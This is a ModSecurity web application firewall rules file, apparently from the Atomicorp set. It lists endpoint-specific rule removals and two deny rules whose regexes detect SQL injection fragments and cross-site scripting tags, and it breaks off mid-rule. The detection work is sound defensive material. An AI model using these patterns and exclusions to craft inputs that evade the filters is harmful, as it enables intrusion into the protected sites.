SecRule REQUEST_FILENAME "/orders/order_userorderform\.php" "phase:2,id:92514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/shibboleth\.sso/slo/redirect" "phase:2,id:92515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/moodle/mod/questionnaire/complete\.php" "phase:2,id:92516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/structure/types/import" "phase:2,id:92517,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367"

SecRule REQUEST_FILENAME "/wp-admin/async-upload\.php" "phase:2,id:92518,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/admin/products/edit\.php" "phase:2,id:92519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/linkit/autocomplete/" "phase:2,id:92520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/sys_sbc/" "phase:2,id:92521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/auroadmin/update-cms\.php" "phase:2,id:92522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/manage/article/" "phase:2,id:92523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/processing\.php" "phase:2,id:92524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/server-side\.php" "phase:2,id:92525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/members/access/admin-setup/" "phase:2,id:92526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/panelediting\.php" "phase:2,id:92527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/sliderdesign\.php" "phase:2,id:92528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/smb/file-manager/code-editor" "phase:2,id:92529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/cf-api/" "phase:2,id:92530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/projects/savedraftproject/" "phase:2,id:92531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113"

SecRule REQUEST_FILENAME "/scriptediting\.php" "phase:2,id:92532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=340157"

SecRule REQUEST_FILENAME "/administration/" "phase:2,id:92533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/update_row/" "phase:2,id:92534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=30147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/luxeadmin/index\.php" "phase:2,id:92535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-cron\.php" "phase:2,id:92536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390616"

SecRule REQUEST_FILENAME "/mip-send\.php" "phase:2,id:92537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=350163"

SecRule REQUEST_FILENAME "/mobilecart\.php" "phase:2,id:92538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/cart" "phase:2,id:92539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/cart\.php" "phase:2,id:92540,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/wp-json/yoast/v1/prominent_words/" "phase:2,id:92541,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/create-project/article/" "phase:2,id:92542,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admincontrolpanel/user\.php" "phase:2,id:92543,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/entity_reference_autocomplete/" "phase:2,id:92544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/assets" "phase:2,id:92545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/pages/admintravels\.php" "phase:2,id:92546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/pages/admintravels\.php" "phase:2,id:92547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/index\.php/jtlconnector/" "phase:2,id:92548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/v1/json/obmstore\.image\.delete/" "phase:2,id:92549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/v1/json/obmstore" "phase:2,id:92550,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/v1/json/obmstore\.template\.convert" "phase:2,id:92551,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/obm/resources/javascript/emaileditor/index\.html" "phase:2,id:92552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=380018"

SecRule REQUEST_FILENAME "/amember/admin-users/autocomplete" "phase:2,id:92553,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/cgi-bin/ms000001\.pl" "phase:2,id:92554,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019"

SecRule REQUEST_FILENAME "/data/feed/rss\.php" "phase:2,id:92555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-content/uploads/galleries/" "phase:2,id:92556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/img/homepage/" "phase:2,id:92557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/services/bmreport\.json" "phase:2,id:92558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340029"

SecRule REQUEST_FILENAME "/members/access/default/admin-payments/" "phase:2,id:92559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/mailscript/emailc\.php" "phase:2,id:92560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/blog_edit\.php" "phase:2,id:92561,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340159"
SecAction "phase:2,id:92562,t:none,pass,nolog,skipAfter:END_RULES_92562"

SecRule ARGS|XML:/*|!ARGS:/article/|!ARGS:/replaceAll/|!ARGS:areas|!ARGS:/^wpt_/|!ARGS:field_value_mapping|!ARGS:/post_code/|!ARGS:tHtml|!ARGS:/_dnn/|!ARGS:actionFilter|!ARGS:Error|!ARGS:code|!ARGS:thecode|!ARGS:param[DEFAULTVALUE]|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:data|!ARGS:resolution|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/^Cms_Page/|!ARGS:json|!ARGS:/php/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:fdata|!ARGS:file_content|!ARGS:/narrative/|!ARGS:data|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:/txt/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:description|!ARGS:/message/|!ARGS:/content/|!ARGS:comment|!ARGS:p_action|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and) {1,100}. char\([0-9]| \b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?;(?:insert|declare ?\@|varchar) ?|and .{1,100} \( ?select .{1,100} from |\bdrop\b {1,100}. table |(?:declare|convert) .{1,100} varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|\bconcat\(|union select |union all select|\bcast\b .{1,50}\( as |xecresultset|' ?; ?declare\b @|; ?set @|select (?:load_file|char\()|(?:insert|remark)test ?;|\bcreate\b table [a-z0-9]+ \()"                 "phase:2,deny,log,auditlog,status:403,capture,id:344159,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,tag:'SQLi'"

SecMarker END_RULES_92562

SecRule REQUEST_FILENAME "/wp-admin/codisto/ebaytab/" "phase:2,id:92563,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/data" "phase:2,id:92564,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
SecAction "phase:2,id:92565,t:none,pass,nolog,skipAfter:END_RULES_92565"

SecRule ARGS|ARGS_NAMES|!ARGS:/li_field/|!ARGS:/media/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:message|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/preview/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env)"           "phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:replaceComments,t:compressWhitespace,t:lowercase,capture,id:391147,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:/li_field/|!ARGS:message|!ARGS:/media/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/preview/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS